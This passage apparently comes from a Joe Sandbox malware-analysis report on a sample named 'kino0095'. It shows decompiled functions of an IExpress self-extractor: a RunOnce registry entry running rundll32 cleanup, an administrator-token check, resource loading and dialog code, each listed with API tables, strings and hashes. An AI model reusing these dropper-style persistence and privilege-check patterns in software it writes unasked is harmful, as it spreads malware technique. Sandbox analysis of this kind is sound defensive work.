                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 010B22D8
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 010B22F5
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 010B2305
                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 010B236E
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 010B237A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010B2299
                                                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010B232D
                                                                                                                                                                                                                                    • wextract_cleanup1, xrefs: 010B227C, 010B22CD, 010B2363
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010B2321
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                                                    • API String ID: 3027380567-2048191181
                                                                                                                                                                                                                                    • Opcode ID: 3e422a0a8352bf7b7446b13086d38244ffb81a9f17cd62b28111efca8d996c32
                                                                                                                                                                                                                                    • Instruction ID: 8092eb77b3ad07927f1ef593f32c97fcba98d9b2277ca6feddf2e4f21aea81dc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e422a0a8352bf7b7446b13086d38244ffb81a9f17cd62b28111efca8d996c32
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8931A771A00218ABDB719B55DCC9FEA7BBCEF54740F0441EAB58DAB010EA75AB84CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E010B3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x10b8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x10b8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E010B43D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x10b8d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x10b88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E010B30C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}









                                                                                                                                                                                                                                    0x010b3108
                                                                                                                                                                                                                                    0x010b310b
                                                                                                                                                                                                                                    0x010b31b7
                                                                                                                                                                                                                                    0x010b31ca
                                                                                                                                                                                                                                    0x010b31d0
                                                                                                                                                                                                                                    0x010b31d0
                                                                                                                                                                                                                                    0x010b31da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b31da
                                                                                                                                                                                                                                    0x010b3111
                                                                                                                                                                                                                                    0x010b3114
                                                                                                                                                                                                                                    0x010b3136
                                                                                                                                                                                                                                    0x010b3136
                                                                                                                                                                                                                                    0x010b3138
                                                                                                                                                                                                                                    0x010b313b
                                                                                                                                                                                                                                    0x010b3141
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3143
                                                                                                                                                                                                                                    0x010b3116
                                                                                                                                                                                                                                    0x010b311b
                                                                                                                                                                                                                                    0x010b314b
                                                                                                                                                                                                                                    0x010b3151
                                                                                                                                                                                                                                    0x010b3158
                                                                                                                                                                                                                                    0x010b316a
                                                                                                                                                                                                                                    0x010b3176
                                                                                                                                                                                                                                    0x010b317d
                                                                                                                                                                                                                                    0x010b318b
                                                                                                                                                                                                                                    0x010b319e
                                                                                                                                                                                                                                    0x010b31a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b31ad
                                                                                                                                                                                                                                    0x010b3120
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b312a
                                                                                                                                                                                                                                    0x010b3134
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3134
                                                                                                                                                                                                                                    0x010b312c
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 010B313B
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 010B314B
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000834), ref: 010B316A
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 010B3176
                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 010B317D
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000834), ref: 010B3185
                                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000FC), ref: 010B3190
                                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,010B30C0), ref: 010B31A3
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010B31CA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 3785188418-612509477
                                                                                                                                                                                                                                    • Opcode ID: 5e7abb7af16aab264f12e68ac5adc5c6244cf5acb0a0fc7a94151bf174923bbe
                                                                                                                                                                                                                                    • Instruction ID: 21b9aa1756faa0d0bed4760a7978b486339069c82b355d53ed28f7dcc6ec7226
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e7abb7af16aab264f12e68ac5adc5c6244cf5acb0a0fc7a94151bf174923bbe
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE11E431204221FBDB715F28ECCCBDA3ABCFB4A720F204A21F9D1AA194D77A8141C754
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B18A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                    			E010B18A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x10b8004; // 0x72151d89
				_v8 = _t23 ^ _t53;
				_t25 =  *0x10b8128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E010B6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E010B17EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x10b8128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x10b8128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}


















                                                                                                                                                                                                                                    0x010b18a3
                                                                                                                                                                                                                                    0x010b18a3
                                                                                                                                                                                                                                    0x010b18ab
                                                                                                                                                                                                                                    0x010b18b2
                                                                                                                                                                                                                                    0x010b18b5
                                                                                                                                                                                                                                    0x010b18be
                                                                                                                                                                                                                                    0x010b18c0
                                                                                                                                                                                                                                    0x010b18c6
                                                                                                                                                                                                                                    0x010b18c7
                                                                                                                                                                                                                                    0x010b18ca
                                                                                                                                                                                                                                    0x010b18cf
                                                                                                                                                                                                                                    0x010b19c9
                                                                                                                                                                                                                                    0x010b19d8
                                                                                                                                                                                                                                    0x010b19d8
                                                                                                                                                                                                                                    0x010b18df
                                                                                                                                                                                                                                    0x010b19b8
                                                                                                                                                                                                                                    0x010b19bd
                                                                                                                                                                                                                                    0x010b19bf
                                                                                                                                                                                                                                    0x010b19bf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b19bd
                                                                                                                                                                                                                                    0x010b18fa
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1912
                                                                                                                                                                                                                                    0x010b19aa
                                                                                                                                                                                                                                    0x010b19ad
                                                                                                                                                                                                                                    0x010b19b3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1927
                                                                                                                                                                                                                                    0x010b1927
                                                                                                                                                                                                                                    0x010b1932
                                                                                                                                                                                                                                    0x010b1936
                                                                                                                                                                                                                                    0x010b19a9
                                                                                                                                                                                                                                    0x010b19a9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b19a9
                                                                                                                                                                                                                                    0x010b194c
                                                                                                                                                                                                                                    0x010b19a2
                                                                                                                                                                                                                                    0x010b19a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b196e
                                                                                                                                                                                                                                    0x010b1970
                                                                                                                                                                                                                                    0x010b1999
                                                                                                                                                                                                                                    0x010b199c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b199c
                                                                                                                                                                                                                                    0x010b1972
                                                                                                                                                                                                                                    0x010b1972
                                                                                                                                                                                                                                    0x010b1975
                                                                                                                                                                                                                                    0x010b1984
                                                                                                                                                                                                                                    0x010b1985
                                                                                                                                                                                                                                    0x010b198a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b198c
                                                                                                                                                                                                                                    0x010b1991
                                                                                                                                                                                                                                    0x010b1996
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1996
                                                                                                                                                                                                                                    0x010b194c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010B18DD), ref: 010B181A
                                                                                                                                                                                                                                      • Part of subcall function 010B17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010B182C
                                                                                                                                                                                                                                      • Part of subcall function 010B17EE: AllocateAndInitializeSid.ADVAPI32(010B18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010B18DD), ref: 010B1855
                                                                                                                                                                                                                                      • Part of subcall function 010B17EE: FreeSid.ADVAPI32(?,?,?,?,010B18DD), ref: 010B1883
                                                                                                                                                                                                                                      • Part of subcall function 010B17EE: FreeLibrary.KERNEL32(00000000,?,?,?,010B18DD), ref: 010B188A
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010B18EB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 010B18F2
                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 010B190A
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 010B1918
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?), ref: 010B192C
                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 010B1944
                                                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 010B1964
                                                                                                                                                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 010B197A
                                                                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 010B199C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 010B19A3
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 010B19AD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2168512254-0
                                                                                                                                                                                                                                    • Opcode ID: 1b69666a8e97b90c1cc3849bde43cace4bd3026e037af12a17dd0142f939735c
                                                                                                                                                                                                                                    • Instruction ID: dbcc47d55e41dfc3ae0fd1a13b94f78b6fda634d26b845d56c55ef8094b16beb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b69666a8e97b90c1cc3849bde43cace4bd3026e037af12a17dd0142f939735c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD313971A10209EBDB609FA9ECD8AEFBBBCFF04340F104469F685E2158D7369905CB61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E010B468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}








                                                                                                                                                                                                                                    0x010b4699
                                                                                                                                                                                                                                    0x010b469b
                                                                                                                                                                                                                                    0x010b46a9
                                                                                                                                                                                                                                    0x010b46af
                                                                                                                                                                                                                                    0x010b46b4
                                                                                                                                                                                                                                    0x010b46bc
                                                                                                                                                                                                                                    0x010b46f9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b46f9
                                                                                                                                                                                                                                    0x010b46d9
                                                                                                                                                                                                                                    0x010b46dd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b46e5
                                                                                                                                                                                                                                    0x010b46ef
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b46f5
                                                                                                                                                                                                                                    0x010b46ff

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
                                                                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 010B46E5
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                    • String ID: TITLE$doza2
                                                                                                                                                                                                                                    • API String ID: 3370778649-4167907646
                                                                                                                                                                                                                                    • Opcode ID: 158d9544d48a66eb3c6b86304054b13ff1210deae79231d7b1730dcb8eab8af1
                                                                                                                                                                                                                                    • Instruction ID: ce1b5148759a7ad47a12fe055d1f40a894802897020eb6eaf5b0e7ae3fde5b55
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 158d9544d48a66eb3c6b86304054b13ff1210deae79231d7b1730dcb8eab8af1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8101A232744210FBE37016A96CCCFAB3E6CDB89B61F040014FBCAD7145C966894483A2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                                                    			E010B17EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x10b8004; // 0x72151d89
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x10ba288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E010B6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}



















                                                                                                                                                                                                                                    0x010b17f6
                                                                                                                                                                                                                                    0x010b17fd
                                                                                                                                                                                                                                    0x010b1805
                                                                                                                                                                                                                                    0x010b180b
                                                                                                                                                                                                                                    0x010b180d
                                                                                                                                                                                                                                    0x010b1815
                                                                                                                                                                                                                                    0x010b1818
                                                                                                                                                                                                                                    0x010b1820
                                                                                                                                                                                                                                    0x010b1824
                                                                                                                                                                                                                                    0x010b182c
                                                                                                                                                                                                                                    0x010b1832
                                                                                                                                                                                                                                    0x010b1837
                                                                                                                                                                                                                                    0x010b1851
                                                                                                                                                                                                                                    0x010b1854
                                                                                                                                                                                                                                    0x010b185d
                                                                                                                                                                                                                                    0x010b1862
                                                                                                                                                                                                                                    0x010b186c
                                                                                                                                                                                                                                    0x010b1872
                                                                                                                                                                                                                                    0x010b1877
                                                                                                                                                                                                                                    0x010b187e
                                                                                                                                                                                                                                    0x010b187e
                                                                                                                                                                                                                                    0x010b1883
                                                                                                                                                                                                                                    0x010b1883
                                                                                                                                                                                                                                    0x010b185d
                                                                                                                                                                                                                                    0x010b188a
                                                                                                                                                                                                                                    0x010b188a
                                                                                                                                                                                                                                    0x010b18a2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010B18DD), ref: 010B181A
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010B182C
                                                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(010B18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010B18DD), ref: 010B1855
                                                                                                                                                                                                                                    • FreeSid.ADVAPI32(?,?,?,?,010B18DD), ref: 010B1883
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,010B18DD), ref: 010B188A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                    • Opcode ID: 47fea858cf0afd2b405097b12851c6b543069df8a9be40de6cf97216e87d3dd6
                                                                                                                                                                                                                                    • Instruction ID: 11b5018a6638e6133fb47c9007683ec6a263f311a99296d5134c6f9ca79a41f8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47fea858cf0afd2b405097b12851c6b543069df8a9be40de6cf97216e87d3dd6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31116371F10209EBDB109FA5EC99AFEBBB8FF44701F100569FA45E7240DA759D008B91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E010B43D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0x10b9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x10b91dc = 1;
					goto L8;
				}
				return 0;
			}








                                                                                                                                                                                                                                    0x010b3459
                                                                                                                                                                                                                                    0x010b345c
                                                                                                                                                                                                                                    0x010b34d8
                                                                                                                                                                                                                                    0x010b34de
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b34e0
                                                                                                                                                                                                                                    0x010b345e
                                                                                                                                                                                                                                    0x010b3463
                                                                                                                                                                                                                                    0x010b349a
                                                                                                                                                                                                                                    0x010b34a0
                                                                                                                                                                                                                                    0x010b34a7
                                                                                                                                                                                                                                    0x010b34b2
                                                                                                                                                                                                                                    0x010b34c4
                                                                                                                                                                                                                                    0x010b34cb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b34cb
                                                                                                                                                                                                                                    0x010b3468
                                                                                                                                                                                                                                    0x010b346e
                                                                                                                                                                                                                                    0x010b3474
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b347c
                                                                                                                                                                                                                                    0x010b348c
                                                                                                                                                                                                                                    0x010b3490
                                                                                                                                                                                                                                    0x00000000
